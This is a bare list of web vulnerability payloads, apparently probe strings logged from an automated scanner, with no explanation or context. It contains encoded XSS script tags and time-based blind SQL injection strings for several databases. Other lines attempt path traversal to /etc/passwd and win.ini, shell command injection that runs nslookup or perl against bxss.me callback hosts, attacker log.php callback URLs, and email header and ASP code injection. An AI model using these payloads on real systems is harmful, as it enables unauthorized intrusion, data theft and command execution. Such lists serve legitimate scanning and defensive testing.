http://attacker-9156/log.php?
}body{acu:Expre/**/SSion(d8Hq(9838))}
\u003CScRiPt\d8Hq(9504)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%64%38%48%71%289625%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9840/log.php?
}body{acu:Expre/**/SSion(foFz(9037))}
\u003CScRiPt\foFz(9026)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%66%6F%46%7A%289673%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9910/log.php?
}body{acu:Expre/**/SSion(oZbY(9844))}
\u003CScRiPt\oZbY(9331)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%6F%5A%62%59%289548%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9434/log.php?
}body{acu:Expre/**/SSion(CaYy(9855))}
\u003CScRiPt\CaYy(9939)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%43%61%59%79%289788%29%3C%2F%73%43%72%69%70%54%3E
http://attacker-9892/log.php?
}body{acu:Expre/**/SSion(GkT5(9274))}
\u003CScRiPt\GkT5(9832)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%47%6B%54%35%289253%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
58noqvww')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
bPma2N9R') OR 221=(SELECT 221 FROM PG_SLEEP(15))--
oZw4Tnqy' OR 612=(SELECT 612 FROM PG_SLEEP(15))--
-1)) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
-5) OR 98=(SELECT 98 FROM PG_SLEEP(15))--
-5 OR 255=(SELECT 255 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+302-302-1=0+0+0+1
-1 OR 2+302-302-1=0+0+0+1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(108).concat(72).concat(120).concat(79)+(require'socket'
So...
"+"A".concat(70-3).concat(22*4).concat(98).concat(80).concat(111).concat(73)+(require"socket"
Soc...
HttP://bxss.me/t/xss.html?%00
ctime
sleep
p0
(I30
tp1
Rp2
.
".gethostbyname(lc("hitdt"."sghuonmrb0968.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(65)...
'.gethostbyname(lc('hitrv'.'zmoajpjrc5781.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(76)...
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
`(nslookup hitwrrgdtzcjq30f4e.bxss.me||perl -e "gethostbyname('hitwrrgdtzcjq30f4e.bxss.me')")`
|(nslookup hitcqcpjqblfm7f633.bxss.me||perl -e "gethostbyname('hitcqcpjqblfm7f633.bxss.me')")
../../../../../../../../../../../../../../windows/win.ini
&(nslookup hitpbyphpogzo7d5aa.bxss.me||perl -e "gethostbyname('hitpbyphpogzo7d5aa.bxss.me')")&'\"...
../../../../../../../../../../../../../../etc/passwd
$(nslookup hitapffvpbupdcb51b.bxss.me||perl -e "gethostbyname('hitapffvpbupdcb51b.bxss.me')")
(nslookup hitosismsovvd6086a.bxss.me||perl -e "gethostbyname('hitosismsovvd6086a.bxss.me')")
|echo qgqldd$()\ joyzek\nz^xyu||a #' |echo qgqldd$()\ joyzek\nz^xyu||a #|" |echo qgqldd$()\ joyze...
&echo svhnbf$()\ uvjxbe\nz^xyu||a #' &echo svhnbf$()\ uvjxbe\nz^xyu||a #|" &echo svhnbf$()\ uvjxb...
echo diamui$()\ lxrjer\nz^xyu||a #' &echo diamui$()\ lxrjer\nz^xyu||a #|" &echo diamui$()\ lxrjer...
to@example.com>
bcc:074625.19373-152956.19373.ea9e0.19130.2@bxss.me
bcc:074625.19373-152955.19373.ea9e0.19130.2@bxss.me
"+response.write(9947550*9151278)+"
'+response.write(9947550*9151278)+'
response.write(9947550*9151278)